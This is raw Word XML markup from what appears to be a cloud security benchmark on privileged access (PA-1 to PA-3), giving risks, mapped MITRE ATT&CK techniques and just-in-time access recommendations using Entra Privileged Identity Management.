    <w:p w14:paraId="77AE8F58" w14:textId="3DD29EF3" w:rsidR="00157068" w:rsidRPr="00E53977" w:rsidRDefault="00157068" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Restrict privileged accounts in on-premises identity systems, security tools, and system management tools with administrative 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rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Apply the following restrictions for cloud resource-level administrative roles:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC196A3" w14:textId="4E18A4EC" w:rsidR="00375DD3" w:rsidRPr="00E53977" w:rsidRDefault="00375DD3" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Restrict critical built-in resource roles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BBC2F7" w14:textId="46C1D90F" w:rsidR="00375DD3" w:rsidRPr="00E53977" w:rsidRDefault="00375DD3" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="108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20118B9E" w14:textId="63B162BF" w:rsidR="00375DD3" w:rsidRPr="00E53977" w:rsidRDefault="00375DD3" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Govern custom resource roles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F23370B" w14:textId="56245293" w:rsidR="00375DD3" w:rsidRPr="00E53977" w:rsidRDefault="00375DD3" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="108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rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Control billing and subscription management roles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E15200" w14:textId="2AB02C79" w:rsidR="00C62854" w:rsidRPr="00E53977" w:rsidRDefault="00375DD3" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="108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529482D0" w14:textId="165E0269" w:rsidR="001F3C2C" w:rsidRPr="00E53977" w:rsidRDefault="001F3C2C" w:rsidP="001F3C2C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc242449492"/>
      <w:r w:rsidRPr="00E53977">
        <w:lastRenderedPageBreak/>
        <w:t>PA-2: Avoid standing access for user accounts and permissions</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="2669DA54" w14:textId="48FFA453" w:rsidR="001F3C2C" w:rsidRPr="00E53977" w:rsidRDefault="001F3C2C" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76156691" w14:textId="00F33CE6" w:rsidR="001F3C2C" w:rsidRPr="00E53977" w:rsidRDefault="001F3C2C" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">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rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="39BFE5DD" w14:textId="1E47D04E" w:rsidR="001F3C2C" w:rsidRPr="00E53977" w:rsidRDefault="001F3C2C" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Unauthorized access from </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>persistent privileged</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve"> accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E2EBE7" w14:textId="53C7E078" w:rsidR="001F3C2C" w:rsidRPr="00E53977" w:rsidRDefault="001F3C2C" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="144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rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Privilege escalation via compromised credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628325B2" w14:textId="0F613B44" w:rsidR="001F3C2C" w:rsidRPr="00E53977" w:rsidRDefault="001F3C2C" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Compromised accounts with </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>persistent elevated</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">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rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Prolonged exposure from stale access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3205D2BE" w14:textId="2EF6CF45" w:rsidR="001F3C2C" w:rsidRPr="00E53977" w:rsidRDefault="001F3C2C" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="144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6B1E0F8A" w14:textId="0DCBBDEF" w:rsidR="001F3C2C" w:rsidRPr="00E53977" w:rsidRDefault="001F3C2C" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D39483" w14:textId="6A43B68D" w:rsidR="001F3C2C" w:rsidRDefault="001F3C2C" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Initial Access (TA0001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7438A46A" w14:textId="2EF3CA89" w:rsidR="00D50663" w:rsidRDefault="00D50663" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="372"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00D50663">
        <w:t>Valid Accounts: Cloud Accounts (T1078.004): Compromising accounts with standing high-privilege roles to authenticate to cloud management consoles or APIs, using persistent credentials to access resources without time-bound restrictions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF567FB" w14:textId="77777777" w:rsidR="00D50663" w:rsidRPr="00E53977" w:rsidRDefault="00D50663" w:rsidP="00D50663">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="2520"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C2D5765" w14:textId="32031278" w:rsidR="001F3C2C" w:rsidRDefault="001F3C2C" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Privilege Escalation (TA0004)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E62489" w14:textId="516CC563" w:rsidR="00D50663" w:rsidRPr="00E53977" w:rsidRDefault="00D50663" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="372"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00D50663">
        <w:t xml:space="preserve">Abuse Elevation Control Mechanism: Cloud Infrastructure (T1548.005): Exploiting </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D50663">
        <w:t>persistent privileged</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D50663">
        <w:t xml:space="preserve"> roles to escalate access by modifying IAM policies, leveraging always-on permissions to gain unauthorized control over subscriptions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04150EFF" w14:textId="561B590F" w:rsidR="001F3C2C" w:rsidRDefault="001F3C2C" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Persistence (TA0003) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3368FC71" w14:textId="3618D122" w:rsidR="00D50663" w:rsidRPr="00E53977" w:rsidRDefault="00D50663" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="372"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00D50663">
        <w:lastRenderedPageBreak/>
        <w:t>Account Manipulation: Additional Cloud Roles (T1098.001): Modifying role assignments to maintain persistent access by adding high-privilege roles to compromised accounts, exploiting lack of time-limited access.</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E53977" w:rsidRDefault="001F3C2C" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Enable just-in-time access through the following approach:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDE693B" w14:textId="1D0B0049" w:rsidR="00574198" w:rsidRPr="00E53977" w:rsidRDefault="00574198" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Deploy Privileged Identity Management </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C053B8" w14:textId="0F4F527D" w:rsidR="00574198" w:rsidRPr="00E53977" w:rsidRDefault="00574198" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Enable just-in-time (JIT) privileged access to Azure resources and Microsoft Entra ID using Microsoft Entra Privileged Identity Management (PIM), where users receive temporary permissions to perform privileged tasks that automatically expire, preventing unauthorized access after permissions expire and generating security alerts for suspicious activity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A67C2F" w14:textId="4E719AC9" w:rsidR="00574198" w:rsidRPr="00E53977" w:rsidRDefault="00574198" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Configure eligible role assignments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600416F7" w14:textId="302BF499" w:rsidR="00574198" w:rsidRPr="00E53977" w:rsidRDefault="00574198" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Admins assign eligible roles to users or groups via PIM, specifying who can request privileged roles and defining activation requirements including approval workflows, MFA requirements, and time-bound durations (typically 1-8 hours)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C0159C" w14:textId="28B7AE1F" w:rsidR="00574198" w:rsidRPr="00E53977" w:rsidRDefault="00574198" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Establish activation workflows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C447706" w14:textId="58178390" w:rsidR="00574198" w:rsidRPr="00E53977" w:rsidRDefault="00574198" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="108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rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Implement automatic expiration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457CF27A" w14:textId="4BD8B4E8" w:rsidR="00574198" w:rsidRPr="00E53977" w:rsidRDefault="00574198" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Access automatically expires when the activation period ends, or users can manually deactivate early if tasks are completed, ensuring privileged permissions don't remain active beyond operational need.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C937CCA" w14:textId="663A6B5F" w:rsidR="00574198" w:rsidRPr="00E53977" w:rsidRDefault="00574198" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Enable JIT for virtual machine access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34236315" w14:textId="6246CC34" w:rsidR="00574198" w:rsidRPr="00E53977" w:rsidRDefault="00574198" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="108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30" w:name="_Toc242449493"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>PA-3: Manage lifecycle of identities and entitlements</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w14:paraId="73B37533" w14:textId="49166B06" w:rsidR="000770CD" w:rsidRPr="00E53977" w:rsidRDefault="000770CD" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEC0296" w14:textId="5B4484D5" w:rsidR="000770CD" w:rsidRPr="00E53977" w:rsidRDefault="000770CD" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Use automated processes or technical controls to manage the complete identity and access lifecycle including request, review, approval, provisioning, and deprovisioning, ensuring </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>permissions</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve"> remain aligned with business needs and are revoked when no longer required</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241736D1" w14:textId="4A7E19C5" w:rsidR="000770CD" w:rsidRPr="00E53977" w:rsidRDefault="000770CD" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5A88F8D3" w14:textId="645E1A47" w:rsidR="000770CD" w:rsidRPr="00E53977" w:rsidRDefault="000770CD" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:lastRenderedPageBreak/>
        <w:t>Unauthorized access due to excessive permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1F99FC" w14:textId="69759BA0" w:rsidR="000770CD" w:rsidRPr="00E53977" w:rsidRDefault="000770CD" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Identities granted more access rights than required, violating least privilege and increasing the attack surface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36031FE2" w14:textId="3EC711AF" w:rsidR="000770CD" w:rsidRPr="00E53977" w:rsidRDefault="000770CD" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Stale or orphaned access from unmanaged accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BF6A2B" w14:textId="177F6150" w:rsidR="00067834" w:rsidRPr="00E53977" w:rsidRDefault="000770CD" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Permissions retained after they are no longer needed or accounts left active after user departure, enabling potential exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC0BE03" w14:textId="744E5441" w:rsidR="00067834" w:rsidRPr="00E53977" w:rsidRDefault="00067834" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Insider threats from misconfigured or unmonitored access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780E9565" w14:textId="54B9A787" w:rsidR="00067834" w:rsidRPr="00E53977" w:rsidRDefault="00067834" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Authorized users misusing permissions due to misconfigured policies or lack of oversight, including bypassing approval processes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408BD79B" w14:textId="3CD74362" w:rsidR="00067834" w:rsidRPr="00E53977" w:rsidRDefault="00067834" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Non-compliance with regulatory standards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9E6B74" w14:textId="4F5B59B1" w:rsidR="00067834" w:rsidRPr="00E53977" w:rsidRDefault="00067834" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Failure to enforce least privilege, access auditing, or timely deprovisioning, risking violations of standards like GDPR, HIPAA, SOC 2, or ISO 27001.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C00438" w14:textId="194F1C76" w:rsidR="00067834" w:rsidRPr="00E53977" w:rsidRDefault="00067834" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Human </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>error</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve"> in access management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F69CEAB" w14:textId="7BA7E871" w:rsidR="00067834" w:rsidRPr="00E53977" w:rsidRDefault="00067834" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Manual processes leading to incorrect permission grants, overlooked deprovisioning, or misconfigured approval chains.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0993A120" w14:textId="5563BC3B" w:rsidR="00067834" w:rsidRPr="00E53977" w:rsidRDefault="00067834" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Lack of auditability and traceability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D023C43" w14:textId="7AF75EA5" w:rsidR="00067834" w:rsidRDefault="00067834" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Absence of proper logging and documentation, hindering tracking of access requests, approvals, or provisioning, delaying breach detection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9856F3" w14:textId="77777777" w:rsidR="00D50663" w:rsidRPr="00E53977" w:rsidRDefault="00D50663" w:rsidP="00D50663"/>
    <w:p w14:paraId="60E7B2D7" w14:textId="4D47D6E5" w:rsidR="00067834" w:rsidRPr="00E53977" w:rsidRDefault="00067834" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B58C966" w14:textId="63C7E71F" w:rsidR="00067834" w:rsidRDefault="00067834" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Initial Access (TA0001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63457547" w14:textId="2E036FD0" w:rsidR="00D50663" w:rsidRPr="00E53977" w:rsidRDefault="00D50663" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="373"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00D50663">
        <w:t>exploiting valid accounts (T1078.004) by leveraging compromised or stale cloud credentials to authenticate to APIs or management consoles, enabling unauthorized access to cloud resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4DBA30" w14:textId="146CE91B" w:rsidR="00067834" w:rsidRDefault="00067834" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Privilege Escalation (TA0004)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B370D18" w14:textId="36F74FF1" w:rsidR="00D50663" w:rsidRPr="00E53977" w:rsidRDefault="00D50663" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="373"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00D50663">
        <w:t>abusing elevation control mechanisms (T1548.005) by exploiting misconfigured RBAC policies or excessive permissions to assign elevated roles from a resource group role.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F26E940" w14:textId="40213D22" w:rsidR="00067834" w:rsidRDefault="00067834" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
